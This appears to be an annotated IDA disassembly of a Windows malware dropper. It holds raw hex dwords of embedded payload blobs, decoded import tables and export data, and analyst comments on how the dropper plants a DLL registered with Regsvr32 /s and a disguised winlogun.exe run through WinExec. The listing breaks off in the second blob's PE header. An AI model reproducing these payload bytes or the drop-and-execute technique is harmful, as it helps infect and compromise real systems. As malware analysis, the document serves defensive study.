276EBF06h, 474D9048h, 0C8B11143h, 0F0F31A36h dd 86364389h, 56267B3Bh, 41CCA9CCh, 0AD33F3F1h, 0B9F68ED6h dd 0FDA98918h, 858429AEh, 518B3487h, 0B01D479Ah, 77AC8577h dd 0CB327586h, 9B3DD28Bh, 929F1B31h, 0E3BADB33h, 80158188h dd 0E9054884h, 7B0A08CDh, 919B014Eh, 384C8924h, 649EE52h dd 5DF591AFh, 19B1DED3h, 0B52412DFh, 0A3FE75AFh, 0FB536FD8h dd 74B7761h, 2A08122Bh, 0BD2D30B9h, 0A62A4ADFh, 4E35D967h dd 0FE4D5F51h, 5CEEF6D2h, 2CAA4DEFh, 9FFEDD16h, 8D64D0A1h dd 48268FBCh, 2318CECFh, 0D877B0CAh, 0D3F8036Fh, 0B7763DEh dd 1F5343E3h, 9E320DDBh, 4E22DE7Ah, 13936F16h, 0D2A9373Bh dd 9CE39EB8h, 39663B2h, 18CAB2C3h, 45E1CD17h, 37CE5537h dd 0CC0DDF21h, 5B5B3CC7h, 0D5EF3FD6h, 5BF4DC89h, 0A6E13AADh dd 0DC45BE0Bh, 0A16F92E4h, 0FC28F9BBh, 
0BD2C287Bh, 0DA1CDDA4h dd 95C90A5Dh, 0EA3F7E1Eh, 9E86DBCEh, 92F44268h, 9DF934FDh dd 44644421h, 8FC33DBFh, 67F40062h, 0A631DCC2h, 0FF389C9Dh dd 890E526Ch, 59CA5D3Eh, 83B85CB0h, 15E8A1BEh, 5498402Eh dd 0ED9EE1B3h, 5F22255Bh, 0B1A6F181h, 0B0631E83h, 0D408C82h dd 82D8955Bh, 0A4793884h, 3096B9A8h, 428C0ED6h, 0F54FE1A3h dd 71C244FAh, 0A0662FB8h, 6DEFE52Ch, 0CB003666h, 0A940FFD6h dd 0B1AAD0E9h, 0F1B39562h, 829910DAh, 0A6A6C092h, 7F8634B9h dd 0E1CAD104h, 9F384E40h, 353A516Dh, 33AD1936h, 0CBB52BFFh dd 96020F9h, 0A43137E6h, 77E856DCh, 7663CBD5h, 810ED5A8h dd 0F89BE0C4h, 48804262h, 0E4C1E83Dh, 6FB3D4B4h, 0CE590CBh dd 0E0726EACh, 519A0CCBh, 37D0C1DEh, 9132DD26h, 165B73DCh dd 0ED32BCAh, 0B4C3C245h, 0B132B862h, 7FE849A2h, 0BBD15069h dd 0D096B642h, 3AF7C40Fh, 42BD1D5Ch, 3A521D60h, 0B93A57EFh dd 9D11D3Bh, 8C974890h, 44228EE8h, 39A15730h, 14265874h dd 0E9CF4C55h, 952B1A13h, 9AB2A06Dh, 22BEBB56h, 28195D89h dd 315D970Ah, 0A6D56FADh, 0EE684E0h, 0F7E3A092h, 0A50E7881h dd 0C8886AE0h, 0F2A24578h, 0A1FC455Fh, 0F4C3F92h, 9C7E805h dd 0E8731915h, 734CF052h, 48E4BD07h, 0ED757EEBh, 1501F836h dd 0D5C55B3Eh, 553700A3h, 0BF74F193h, 6EAAF0CBh, 0B856BF9Eh dd 80E327Eh, 5696F37Bh, 0A29BD2B5h, 88A8E247h, 8B9BFC67h dd 4A2BD9BAh, 2C97C5F9h, 3726DB41h, 5A44BBE3h, 0A344BA64h dd 0A7CD4987h, 0A1CC3FCEh, 5F9335BAh, 0E60779A4h, 0C461BADFh dd 6B5AF894h, 0F12DE0B8h, 4DA937F4h, 8FE6EB03h, 0BA75A89Fh dd 9CACD686h, 172DF8E6h, 0E72BA8C0h, 6A2474C1h, 0E111E1FAh dd 0DA2F273Eh, 0A213F3Fh, 0CDCAFC19h, 4993EAAFh, 472847FCh dd 0CC03AEFFh, 1E5E4D91h, 81D6D1F5h, 0DBE20FF3h, 2C62D750h dd 0B293A2Bh, 68E44630h, 7C1C4DDBh, 7B4B87FFh, 0C7FD143Bh dd 0D6FAFFEh, 0CBD6223Dh, 22AB206Ah, 783A88D6h, 0C9DC8635h dd 21F7AA82h, 0EAFC02CFh, 0CCCA8BC2h, 0E9D3EB51h, 0ABC27558h dd 0B2B78DB8h, 7A1D7A60h, 5450966Dh, 17922F4Bh, 0D1701FC7h dd 8A031F29h, 0FE047301h, 17A238C9h, 0EB75FC1Ah, 7A0A77D9h dd 0C62EEB52h, 0A27618A2h, 204E083Dh, 0BDE5EA0Dh, 0EB9D0A35h dd 0BB2F4759h, 0F707FC33h, 199997BDh, 0AE69FF8Ch, 414E7996h dd 0C7EA7F03h, 9454DB2Dh, 
4DB014Bh, 56A06704h, 4F33416Dh dd 4084A809h, 0F3A847A9h, 0DB7D586Ch, 7E9D2AD0h, 377F5692h dd 398DC960h, 4A68B401h, 0D4B9011h, 0B7476F0h, 0A9290F63h dd 9B9B9E53h, 38AFC607h, 0D54DEB3h, 63B12FE2h, 37D693Fh dd 0D1917A8Fh, 4B84304Eh, 1E050EF6h, 306AE673h, 0C292B470h dd 0C4DC4540h, 0CA0D3E11h, 0A4D3F7E3h, 42571EEFh, 85438468h dd 7F2B449Ch, 0BB02F21Eh, 0A949B354h, 0ED765997h, 0AF7E260Eh dd 1AC04F3h, 0D7C99725h, 0D39436D6h, 9516F400h, 54A12647h dd 0EE52AEEh, 81CAC07Ch, 81BF01EBh, 0A7D41779h, 300D8864h dd 0EE725FEFh, 9309612Bh, 0F72030C2h, 8A56FB0Ch, 36785960h dd 5DAF6AA9h, 3D111B82h, 60A99D38h, 4DCB4168h, 73569A3Fh dd 596A5413h, 5F8DCDF1h, 0CCBE5A54h, 126F3F92h, 0F1F1DB35h dd 0E9573AA4h, 3633F6BAh, 5E14966Bh, 654B543Ah, 0D9965D17h dd 8682D851h, 63A4B458h, 0EFFCB6D1h, 768DB07Fh, 1DFCFB77h dd 0A2CE654h, 6DB1C91Eh, 2B602F80h, 7EC442C6h, 9FE9CC10h dd 0A294D1DCh, 3A88D96Eh, 67184F0Ah, 358309BBh, 1A90FC29h dd 6004E92Ah, 0E8779E65h, 0B1D5918Fh, 0EDE5BDF0h, 64ECB066h dd 0C3E22DF6h, 254FECA3h, 0CC8F9CC5h, 656E5F89h, 32E0F76Ch dd 4B554A78h, 31C7F3A3h, 5E227EE7h, 5A565DDh, 0FE47BB62h dd 125C231Fh, 2DE2E1B3h, 51170977h, 22FF325Dh, 0C8ACD6B9h dd 0B5E94440h, 60BACEEh, 0DCF396D9h, 0EA7257C9h, 68384EBEh dd 7DF384C1h, 4466F0EDh, 0F6BDC0A2h, 86ABB8D0h, 222D2115h dd 0CEFC79E8h, 293AF0F3h, 0D1A9FBE3h, 9255453Fh, 9B0D03D7h dd 46BF0A7Bh, 9DF4EC51h, 45FF2C72h, 32E4AA8Fh, 3A3CC5B1h dd 7DE62ABFh, 0E9D668C1h, 4DC4B762h, 9D7EA10h, 0DF999A81h dd 0F1383637h, 0CC057B32h, 264C181Ch, 0BD20CF40h, 2D8B33FBh dd 61E8D02Ch, 0AD7EE7B9h, 0F3528488h, 51CFF488h, 0B0BBC1CDh dd 0A1203CF0h, 80B98C7Bh, 48F9E134h, 18D8BD5Ch, 0B2DC6643h dd 1F115C0Ah, 2F764088h, 57AB2E64h, 4C2CC90Fh, 91451FC8h dd 0CEBD1702h, 38782AC7h, 5D0BEFCDh, 62F6002Ah, 0CAA93B66h dd 0B9CBAF79h, 0E00D5AE5h, 3BD8730Ah, 68FDA558h, 3B840F11h dd 0DE01E1ADh, 0E53C8511h, 272C234Ah, 0F98D97ADh, 59CBF9B7h dd 0C1AA1E24h, 890F87A0h, 911F2B2Fh, 7A64187Fh, 0B8340490h dd 90951FB1h, 0D90D9258h, 8A2DA41Bh, 0E2EA03A3h, 8D88257Ch dd 3899D1E5h, 33FB35F0h, 33FA00EEh, 
0A4B42B8h, 0F13CF66h dd 0ECC90D6Fh, 9C3903F6h, 5DE37BF5h, 8E63E8Ch, 0FC773AEAh dd 4E7DB9AAh, 0F9E26887h, 7543EDC8h, 0FF2918E6h, 0EA33CA5Eh dd 376F436Ch, 0F93D7DA9h, 0CD09D585h, 0AECFD204h, 9FD564C2h dd 2B2D4891h, 6345A271h, 0D7AB3B66h, 9BDC66C8h, 7C3C2741h dd 1B8B0ACh, 2BCE7935h, 6733001Bh, 65EBCB01h, 0D159E07Eh dd 93BD0E7Eh, 8969511Eh, 66FC3C03h, 0B260EC41h, 11BB1203h dd 0DCC4ED3Bh, 0E9222279h, 59C9FDC8h, 0FE471724h, 48C68C39h dd 0D769A7F1h, 0A55B56C2h, 0B5F6D23Ah, 0E120E7D3h, 4EE6F09Ah dd 939DEA58h, 0D89BDC71h, 233ADADBh, 0C71A33F0h, 18A1E1D4h dd 96EDC5F3h, 0DD1EBA5Bh, 0DAB1F391h, 0D016D85Fh, 0FC754F80h dd 23E65771h, 5BCA00F5h, 28148936h, 61FF328Dh, 0D6F4D0C8h dd 827C39CBh, 3313B42Ch, 885BEB46h, 89B795C1h, 1A02E7CBh dd 286E6B8Eh, 386B2A4Eh, 7D807079h, 543C5001h, 0C3A555ECh dd 323BA5F3h, 0BDF09DB1h, 0B97278F2h, 281C641Ch, 0E30EA770h dd 97B9B741h, 0A3DDD034h, 0CA216C1h, 2A7BF6F2h, 2A53A785h dd 75CCF609h, 0EFEDCCA0h, 0FB53BBC5h, 0CC339325h, 33B71226h dd 0AEB1D5CEh, 8F41FFA3h dd 23238ECCh, 34135000h, 41F1C6B3h, 3A11FE14h, 0A9008E27h dd 66D40B40h, 7E8B4A40h, 70F2233Ch, 6B214EE6h, 19FDB715h dd 0B1D72FD3h, 8D7E5211h, 0A676C763h, 4B3D9243h, 0C73C6A9Eh dd 0EFF9344h, 3058DFFCh, 1A5660FAh, 314E336Bh, 0CA53E565h dd 5F8B0166h, 60F1D00Bh, 0F8AA8F8Ah, 64D74914h, 0DDD7E721h dd 34E55296h, 0F4CCA91Bh, 0BB1E939Bh, 4AA76A8Ch, 0BAF99C8Bh dd 0FD99A1B6h, 327F529Dh, 0BA1655CDh, 8C7AC85Ah, 2C9A487Bh dd 0FEF1B0Dh, 0BB5B64Dh, 0AABB1A8Eh, 0BC7CCA94h, 43EEEE98h dd 1B943360h, 0D6151F51h, 2997706Ah, 0C02CDF2Eh, 0B79D1CDFh dd 3F37FB7Dh, 33E623FEh, 0FDE96AACh, 11DF61D7h, 15644E25h dd 56061C9Bh, 99A3A7Eh, 9ECF3921h, 0EC5000C1h, 7346480Fh dd 0C45C9165h, 13596285h, 279878BCh, 0C05B650Bh, 8CA0A86Ah dd 505ACF16h, 0B811F122h, 3721CFAh, 2AD042CDh, 9053699h dd 3C04D59Bh, 115A2EA8h, 1D02022Fh, 41E35782h, 8CD48EC5h dd 0A0A7F630h, 227B1941h, 3489E677h, 5015FD2Ah, 0B468A7AFh dd 0A1A1C2A2h, 109F1295h, 5EC43329h, 0E7C02530h, 0E72E20C3h dd 0FC8BDDF7h, 0D445C1E7h, 0F4B039EAh, 75E0E041h, 0F2025914h dd 5DA2221Fh, 
4C48BF5Ah, 95998793h, 0C6958A17h, 0B3B2F352h dd 0F79C3A50h, 9BA07E6Ch, 98953C81h, 0F29DD918h, 2606472Ch dd 0BC03CECCh, 0FAC311C3h, 0E8431B86h, 40BC0654h, 0AB77A5F8h dd 0D20858B4h, 272F7F16h, 0E3FCBC77h, 0F48C965Ch, 8E13A3E2h dd 0DC009276h, 4F827616h, 0E9F329C5h, 9A169F8Dh, 4C6D4D6Fh dd 52ED4041h, 4005DB6Ah, 1025363Eh, 0F80D9E83h, 0DF35963Ah dd 524B203Bh, 65DD2038h, 0BAF9B3D0h, 0F9722F0Ah, 671AA069h dd 0BABF658Bh, 8187593Fh, 0A60B8615h, 35D84D09h, 7466D8C0h dd 6DF70A08h, 91277780h, 0C9B64A91h, 0E267F324h, 604FA3E3h dd 67B4C9C9h, 0BA73C2DDh, 75EF4B08h, 0D41A3494h, 1A1AC077h dd 834A201Dh, 5225982h, 3BA92A06h, 6515DC3Ah, 0E0F45FC3h dd 73A0CCB3h, 22DD2632h, 0AE121334h, 367072C6h, 0E1FC7D3h dd 0EB33F5C9h, 0FC2D82D8h, 0AE972E55h, 963B40ECh, 0A417818Fh dd 0FA5CEC61h, 0F268A338h, 4E0879E4h, 5C28ACCDh, 15233FFh dd 82A5C62Ah, 3917853Eh, 0E54BEC5Ah, 8FB5AD5Eh, 89B7DAE8h dd 2FB6E7A6h, 267F7D9h, 842C7754h, 9584E05Bh, 5AF82A13h dd 9BF8329Eh, 11CEEC56h, 38B83850h, 0DDCB7B60h, 695182A3h dd 0CF1776B1h, 3E139D28h, 35C97DADh, 0C53C940Bh, 0BE77EF10h dd 0A71360B5h, 0C8F02932h, 0BA359487h, 0E939800Ah, 2F3233C2h dd 73741BEDh, 0F3DBE081h, 0C379DE4Ch, 0A0070B9Ch, 819E4BC3h dd 99DC5F80h, 30AD7CC9h, 0C0643D56h, 0C553B2F0h, 519715C0h dd 82F554FBh, 59679ADDh, 121D6D3Bh, 0D44CE691h, 0E65791F6h dd 8F21C856h, 93362512h, 5570D7CBh, 3CA74B85h, 40F9C5A5h dd 99D20C81h, 0A4D12211h, 0C6DF4D77h, 20CEB5E6h, 0D4FB5F91h dd 0B1EE5DADh, 3F1F4501h, 0CB2D1109h, 3AE9B699h, 0C2650786h dd 1AF6215h, 5FF7843Fh, 13C2A3FAh, 0B8A0AF75h, 0BF29428Dh dd 0C9027CE4h, 67BBD6B7h, 79471BB3h, 9E837E01h, 0C6C566D0h dd 9624E583h, 376A32FAh, 9AE1E2E3h, 0DAC72ECCh, 2F0D9E3Eh dd 0D340E4F2h, 0B35FDE11h, 0DD093255h, 0A18D40D0h, 26FCA5F9h dd 0BE47E857h, 0AAA9A6D2h, 20F3AD42h, 65877B4Ch, 0DFC773FCh dd 0EAAD85E0h, 28E0E4BAh, 401B5DCEh, 7B554980h, 402F5159h dd 0C0BA7359h, 0D387396Dh, 1C69325Bh, 0A1DFA026h, 0CED86DCFh dd 7D89B95Dh, 7602B34Ah, 0A2D389B2h, 5F9D2ECh, 0BB4CF50Ah dd 893A3BB0h, 766CDE1Dh, 79CB0C5Dh, 44F9A8D9h, 6769A8B3h dd 
13F58361h, 0CF434230h, 183CF3AAh, 7EB6E43Bh, 7B2D0841h dd 0E909D4E1h, 3ED018ABh, 538CEE57h, 96459395h, 0BA38D13Ch dd 1DA8A9F6h, 0D5EE7F9h, 0B5A190BEh, 3F8BE9B6h, 0F1CC447Bh dd 0F3F9EFDFh, 0B6E42443h, 83D36881h, 2996AD8Ah, 6C026365h dd 0BA52B66Eh, 0E9E6758Fh, 860876D9h, 2C4DCEF6h, 3323C569h dd 6AE4AE75h, 0EEB0D3E0h, 0DCFE02B9h, 0DB1FFB7Fh, 2130C556h dd 7F58CA1Eh, 0BFDCDAC4h, 0DCAD97CAh, 92C6D62Eh, 7AA97B36h dd 17EA8E6Dh, 8F488CFAh, 3D46714Ah, 9DB0C352h, 0B947F623h dd 86C939E1h, 0D098EF5Dh, 0A8411EEDh, 7CD8ACF5h, 3318155Ch dd 5A379C77h, 832D395h, 81E162F2h, 0F50CA846h, 87EE06F9h dd 0FCB0906h, 0EDDD47D2h, 8F013100h, 162A78A1h, 9590238Dh dd 0A0980D38h, 281B76B2h, 614E59Eh, 200E9968h, 0DAD13FA1h dd 12F4AA72h, 0F0DF0FF3h, 53CF0C65h, 8195CBE0h, 57FC92A6h dd 21202AF0h, 4B7E6C91h, 0E443EF76h, 17905D66h, 288FD132h dd 2C3B3FBh, 0C37E055Fh, 8CE0FA98h, 6D2973C7h, 0F2E9EAD4h dd 0A2A75AF1h, 8AC9B063h, 0BED51B5Dh, 0DE413D22h, 0AE8F9419h dd 5281BE5Fh, 0B3E9958Fh, 0EBE5A187h, 9B95740Bh, 932683F8h dd 0E1966B98h, 0CA5AD49Ah, 8F2B0DC0h, 0C97A32E8h, 9FDC358h dd 0A7A5C3CEh, 4F4C7AAAh, 0FFAE50CAh, 24FB6D53h, 0B84D3DFEh dd 0F1745734h, 0FE59D480h, 34461D89h, 580EFBA3h, 0CEAD4Fh dd 9A9C922Eh, 650BF88Eh, 0B4673B51h, 0E4EFC0DCh, 1E900D21h dd 4A12D7F9h, 0CEDCFE40h, 0E4B77A64h, 6CE66A4Dh, 0CB57FA26h dd 60DB4B83h, 76357348h, 3969BDF8h, 55F18FD6h, 63AAD1A4h dd 6AF35A8h, 0AB9C79AFh, 4251FB0h, 74C05A7Ah, 6F51FB0Bh dd 7A5BE25Dh, 0BD889614h, 0D9D7F223h, 3565EF15h, 4AAE509Ah dd 0D8D41851h, 0D0235851h, 65537C45h, 13D51DF3h, 0F76712D6h dd 8C22DAB4h, 2FFB9044h, 0D4AE4EA4h, 0ABA2BC95h, 6E54D173h dd 74777A6Fh, 14A7F302h, 6F6BBC25h, 0AE960819h, 67CF71D0h dd 0DB737409h, 1C959128h, 7CB446C0h, 0F632AB28h, 0FF934B0Ch dd 4009C047h, 8955FB38h, 553C7BABh, 1DC7ECFBh, 0D6E051F0h dd 0C8743C31h, 0C68C0343h, 87C1E053h, 0B0F71FDBh, 0FED8AC87h dd 0F84F2202h, 0C3405105h, 173515BAh, 67693BD0h, 0CE56D07Dh dd 2E27D7D2h, 79B26CDAh, 0F6C4BDFAh, 197F7A8h, 69B013D4h dd 5135A621h, 5055DEC6h, 75F87A51h, 6D5451F6h, 8561899Ah dd 
0B2E3AE4Dh, 9E4424D0h, 6FF27AFFh, 1655A9C2h, 0D009296Fh dd 0E91989C9h, 327B1311h, 0BB73A262h, 0E0183354h, 0EC1CC221h dd 0D71F9419h, 4086E1C0h, 7CCF4686h, 5AE019E3h, 4059C0FCh dd 0E3721365h, 534C8E18h, 0C9573864h, 0CAD5D485h, 758D67B5h dd 0EDDF94B3h, 0E9D95A06h, 0C644B548h, 7B20A2FDh, 43F38610h dd 88DAAA06h, 518E77BFh, 0AA03FE0Eh, 0D481E6DAh, 0D797E50h dd 4D29837Ah, 0BF94EC48h, 2838F191h, 0E45AE775h, 493B88A5h dd 61EFA68h, 0F16207C8h, 0E8462FD1h, 3548B77Ch, 6E011036h dd 4758F03h, 99376F30h, 0FFF914A7h, 0FDAA21E0h, 0DEFC9E5h dd 0F0D03A1Eh, 32175966h, 1D467284h, 0ED0A5F4Dh, 186C9F25h dd 0ECECE33Eh, 398E7B0Bh, 0CD99EF52h, 4D1EA7FAh, 8FC86E8Bh dd 0E5FB80CCh, 0AE697040h, 0EEABE3A5h, 5B1E88F9h, 0AA355778h dd 124A1BB0h, 3DA77CCFh, 3746666Bh, 0B3980065h, 0C0B5BEF2h dd 15EB22CEh, 98E0488h, 0FFCB676Eh, 0A0921429h, 90A0D38Ch dd 0DBDE631Ah, 6155AA83h, 0AB019F0Ch, 0FE16F94Ch, 0A3B248AEh dd 0D2752B1Bh, 55E557B1h, 0A45D260Fh, 8470F186h, 0EB3172A6h dd 0EA2733C8h, 648440CFh, 4955F4E1h, 9081B022h, 8DC52186h dd 1087B102h, 0A017E205h dd 0AA9B8EDFh, 793CE53h, 4E97C4D9h, 81110443h, 0E238D119h dd 4AD0CBF9h, 9B25579Dh, 0F98B697Bh, 49D1911Eh, 0B07450BDh dd 0D338333Fh, 36F302Ch, 0ADBE6502h, 151BF1FEh, 1508359Ah dd 54916E98h, 39519023h, 90034784h, 29B6D60h, 3EA9FB39h dd 26A6E845h, 9EDBDCE9h, 6D04B9F4h, 58E9307Bh, 0F6FE65CFh dd 0C5F308BFh, 0FE03EDC0h, 6055C42Ah, 5116A29Ch, 1E75B59h dd 82CEAD59h, 29CAD588h, 50C6758Ah, 0C5BD77DCh, 0A0AFA65Fh dd 516BE65Ch, 7D742276h, 3414865Fh, 35E1AF1Bh, 809A20C2h dd 6BBE2091h, 0B719BD79h, 17EF1851h, 0C591881Fh, 1C169A7h dd 0C5E54E1Bh, 0C3C8B169h, 0F3ED9084h, 22219AF5h, 0CC8DEC2Dh dd 8058DD7Fh, 0DC29F0A6h, 0E2103BF1h, 42F5C51Ch, 0B0521B33h dd 0E6464A8Ch, 0E1F047Ah, 428CB755h, 0B0E8F62h, 0D4063C07h dd 78h, 26h dup(0) dd 3174h, 3064h, 3 dup(0) dd 32FEh, 30B8h, 3 dup(0) dd 342Eh, 30F8h, 3 dup(0) dd 34D2h, 3120h, 5 dup(0) dd 3182h, 3194h, 31ACh, 31C0h, 31D4h, 31E8h, 3204h, 3212h dd 321Ah, 322Eh, 3248h, 3258h, 3266h, 3278h, 3288h, 32A2h dd 32B4h, 32C2h, 32D4h, 32E6h, 
0 dd 330Ah, 3318h, 332Eh, 3348h, 3356h, 336Ch, 3380h, 3394h dd 33A8h, 33BEh, 33CEh, 33E0h, 33F2h, 3404h, 3414h, 0 dd 3438h, 3444h, 345Ah, 346Ah, 3476h, 348Eh, 34A8h, 34BCh dd 34CAh, 0 dd 34E0h, 34FAh, 350Ch, 351Ch, 3534h, 3548h, 3560h, 3572h dd 3582h, 3590h, 35A8h, 35BCh, 35D4h, 35E6h, 35F6h, 3606h dd 361Ah, 362Ah, 363Ah, 365Ch, 0 dd 4E52454Bh, 32334C45h, 4C4C442Eh, 0 aVirtualprotect db 'VirtualProtect',0 align 4 dd 65530000h, 6E614874h, 49656C64h, 726F666Eh, 6974616Dh dd 6E6Fh, 65470000h, 72745374h, 54676E69h, 45657079h, 4178h dd 65470000h, 6D754E74h, 46726562h, 616D726Fh, 4174h, 65470000h dd 646F4D74h, 48656C75h, 6C646E61h, 4165h, 65470000h, 69725074h dd 65746176h, 666F7250h, 53656C69h, 69746365h, 416E6Fh dd 65520000h, 69466461h, 7845656Ch, 0 aSleep db 'Sleep',0 align 10h aIsdebuggerpres db 'IsDebuggerPresent',0 align 4 aGetprocessprio db 'GetProcessPriorityBoost',0 dd 69460000h, 6552646Eh, 72756F73h, 416563h, 54550000h dd 69676552h, 72657473h, 0 aIsbadstringptr db 'IsBadStringPtrW',0 dd 75420000h, 43646C69h, 446D6D6Fh, 574243h, 72540000h dd 746E4579h, 72437265h, 63697469h, 65536C61h, 6F697463h dd 6Eh, 50746547h, 41636F72h, 65726464h, 7373h, 78450000h dd 72507469h, 7365636Fh, 73h, 54746547h, 61657268h, 6D695464h dd 7365h, 65470000h, 6D6F4374h, 646E616Dh, 656E694Ch, 41h dd 656C6544h, 72436574h, 63697469h, 65536C61h, 6F697463h dd 5355006Eh, 32335245h, 4C4C442Eh, 0 aShowwindow db 'ShowWindow',0 align 4 dd 654D0000h, 67617373h, 786F4265h, 69646E49h, 74636572h dd 41h, 616F7242h, 73616364h, 73795374h, 4D6D6574h, 61737365h dd 576567h, 65440000h, 676C4466h, 636F7250h, 41h, 6E65704Fh dd 646E6957h, 7453776Fh, 6F697461h, 416Eh, 6F4C0000h, 654D6461h dd 6E49756Eh, 65726964h, 577463h, 73490000h, 6C616944h dd 654D676Fh, 67617373h, 4165h, 6E550000h, 69676572h, 72657473h dd 73616C43h, 5773h, 64440000h, 65755165h, 654E7972h, 65537478h dd 72657672h, 0 aImpqueryimea db 'IMPQueryIMEA',0 align 4 aSetwindowshook db 'SetWindowsHookA',0 dd 65520000h, 74736967h, 6C437265h, 57737361h, 0 
; ===========================================================================
; Annotation: embedded payload metadata (data, not code that runs in place).
;
; The start routine at the top of this listing writes 3A98h bytes beginning at
; dword_403004 to <system directory>\hsjefi8wunkmdf.dll and registers the file
; with "Regsvr32.exe /s". It then writes 3A98h bytes beginning at dword_406A9C
; to <temp path>\winlogun.exe and starts that file with WinExec.
; 403004h + 3A98h = 406A9Ch, so everything before dword_406A9C in this span
; belongs to the first blob and everything from dword_406A9C on to the second.
;
; IDA recognised some import names as strings and left the rest as dd. In the
; dd form each dword holds four ASCII bytes, least significant byte first; the
; decoded text is given in the trailing comments. The 0000 low word in front of
; a name looks like the import hint field.
;
; NOTE(review): an import name table shows only what the image may call. Which
; of these APIs are actually used has to be confirmed from the code; the
; GDI/IME entries may be filler.
; ===========================================================================

; --- import names, continuing a name list that starts before this span ---
aDialogboxparam db 'DialogBoxParamW',0
                dd 654D0000h, 67617373h, 786F4265h, 577845h, 65520000h ; "MessageBoxExW", then "Re"...
                dd 74736967h, 69577265h, 776F646Eh, 7373654Dh, 41656761h ; ..."gisterWindowMessageA"
                dd 44470000h, 2E323349h, 4C4C44h, 6E490000h, 74726576h ; "GDI32.DLL" (library name), then "Invert"...
                dd 6E6752h, 65470000h, 686E4574h, 6174654Dh, 656C6946h ; ..."Rgn"; "GetEnhMetaFile"...
                dd 73746942h, 0         ; ..."Bits"
aSettextalign   db 'SetTextAlign',0
                align 10h
aStartdocw      db 'StartDocW',0
                align 4
aPlayenhmetafil db 'PlayEnhMetaFileRecord',0
                align 4
aGetsystempalet db 'GetSystemPaletteEntries',0
                dd 65530000h, 42494474h, 54737469h, 7665446Fh, 656369h ; "SetDIBitsToDevice"
                dd 65530000h, 74654D74h, 6E675261h, 0 ; "SetMetaRgn"
aChord          db 'Chord',0
aAdvapi32_dll   db 'ADVAPI32.DLL',0     ; library name; crypto, service and token/ACL names follow
                align 4
                dd 72430000h, 45747079h, 506D756Eh, 69766F72h, 54726564h ; "CryptEnumProviderT"...
                dd 73657079h, 57h, 70797243h, 65724374h, 48657461h, 687361h ; ..."ypesW"; "CryptCreateHash"
                dd 704F0000h, 65536E65h, 63697672h, 5765h, 624F0000h, 7463656Ah ; "OpenServiceW"; "Object"...
                dd 6E65704Fh, 69647541h, 616C4174h, 576D72h, 72430000h ; ..."OpenAuditAlarmW"; "Cr"...
                dd 47747079h, 72507465h, 6150766Fh, 6D6172h, 72430000h ; ..."yptGetProvParam"; "Cr"...
                dd 41747079h, 69757163h, 6F436572h, 7865746Eh, 4174h, 72430000h ; ..."yptAcquireContextA"; "Cr"...
                dd 44747079h, 76697265h, 79654B65h, 0 ; ..."yptDeriveKey"
aCrypthashdata  db 'CryptHashData',0
                align 4
aIsvalidsid     db 'IsValidSid',0
                align 4
                dd 65470000h, 6D614E74h, 65536465h, 69727563h, 6E497974h ; "GetNamedSecurityIn"...
                dd 416F66h, 65530000h, 746E4574h, 73656972h, 63416E49h ; ..."foA"; "SetEntriesInAc"...
                dd 416Ch, 75420000h, 54646C69h, 74737572h, 69576565h, 614E6874h ; ..."lA"; "BuildTrusteeWithNa"...
                dd 41656Dh, 704F0000h, 68546E65h, 64616572h, 656B6F54h ; ..."meA"; "OpenThreadToke"...
                dd 6Eh, 70797243h, 636E4574h, 74707972h, 0 ; ..."n"; "CryptEncrypt"
aInitializesid  db 'InitializeSid',0
                align 4
aAdjusttokengro db 'AdjustTokenGroups',0
                align 10h
aReporteventa   db 'ReportEventA',0
                align 10h
aCryptdecrypt   db 'CryptDecrypt',0
                align 10h
aLookupsecurity db 'LookupSecurityDescriptorPartsA',0
                align 10h
                dd 72430000h, 53747079h, 72507465h, 6150766Fh, 6D6172h ; "CryptSetProvParam"

; --- export data of the first blob ---
; Read as an IMAGE_EXPORT_DIRECTORY the fields below are self-consistent: the
; three table RVAs and the four name RVAs line up with the sizes of the items
; that follow. The internal module name decodes to "bensorty.dll", which
; differs from the name it is dropped under (hsjefi8wunkmdf.dll). The four
; exports are the standard COM in-process server entry points; "Regsvr32 /s"
; calls DllRegisterServer, so that export is presumably where the payload's
; own logic starts - TODO confirm in the DLL's code.
                dd 0                    ; Characteristics
                dd 496C9E67h, 0         ; TimeDateStamp (mid-January 2009 as a Unix time; forgeable, weak indicator), version 0.0
                dd 36C0h, 1, 2 dup(4), 3698h, 36A8h, 36B8h, 11A8h, 11ACh ; Name RVA, Base 1, 4 functions / 4 names, table RVAs; function RVAs begin
                dd 1719h, 11A2h, 36CDh, 36DDh, 36EFh, 3701h, 10000h, 30002h ; 1719h pairs with DllRegisterServer; name RVAs; ordinal indexes 0..3
                dd 736E6562h, 7974726Fh, 6C6C642Eh, 6C6C4400h, 556E6143h ; "bensorty.dll", "DllCanU"...
                dd 616F6C6Eh, 776F4E64h, 6C6C4400h, 43746547h, 7373616Ch ; ..."nloadNow", "DllGetClass"...
                dd 656A624Fh, 44007463h, 65526C6Ch, 74736967h, 65537265h ; ..."Object", "DllRegisterSe"...
                dd 72657672h, 6C6C4400h, 65726E55h, 74736967h, 65537265h ; ..."rver", "DllUnregisterSe"...
                dd 72657672h, 3Bh dup(0) ; ..."rver", then zero padding

; --- looks like one base-relocation block: page RVA 1000h, block size 26h,
;     fifteen 16-bit entries whose high nibble is 3 - TODO confirm ---
                dd 1000h, 26h, 3152301Eh, 32FB31A8h, 34743398h, 372C358Ah
                dd 38353758h, 399938F7h, 3AC83A7Ah, 3B52h, 41Ch dup(0) ; zero fill up to the end of the first blob

; ===========================================================================
; dword_406A9C: first byte of the second blob (dropped as winlogun.exe).
; The bytes decode as a PE32 image header; the field values are read off the
; dwords below.
; ===========================================================================
dword_406A9C    dd 905A4Dh, 3, 4, 0FFFFh, 0B8h, 0 ; 4Dh 5Ah = "MZ" DOS signature
                dd 40h, 8 dup(0)
                dd 0F0h, 0EBA1F0Eh, 0CD09B400h, 4C01B821h, 685421CDh, 70207369h ; offset 3Ch: e_lfanew = 0F0h; DOS stub, "This p"...
                dd 72676F72h, 63206D61h, 6F6E6E61h, 65622074h, 6E757220h ; ..."rogram cannot be run"...
                dd 206E6920h, 20534F44h, 65646F6Dh, 0A0D0D2Eh, 24h, 1Dh dup(0) ; ..." in DOS mode."
                dd 4550h, 2014Ch, 496C9E5Ch, 2 dup(0) ; "PE" signature, machine 14Ch (i386), 2 sections, TimeDateStamp 0Bh below the DLL's
                dd 10F00E0h, 5010Bh, 1C00h, 600h, 0 ; optional header size 0E0h, characteristics 10Fh; magic 10Bh (PE32)
                dd 2 dup(1000h), 3000h, 400000h, 1000h, 200h, 4, 0 ; entry point RVA 1000h, image base 400000h, file alignment 200h
                dd 4, 0
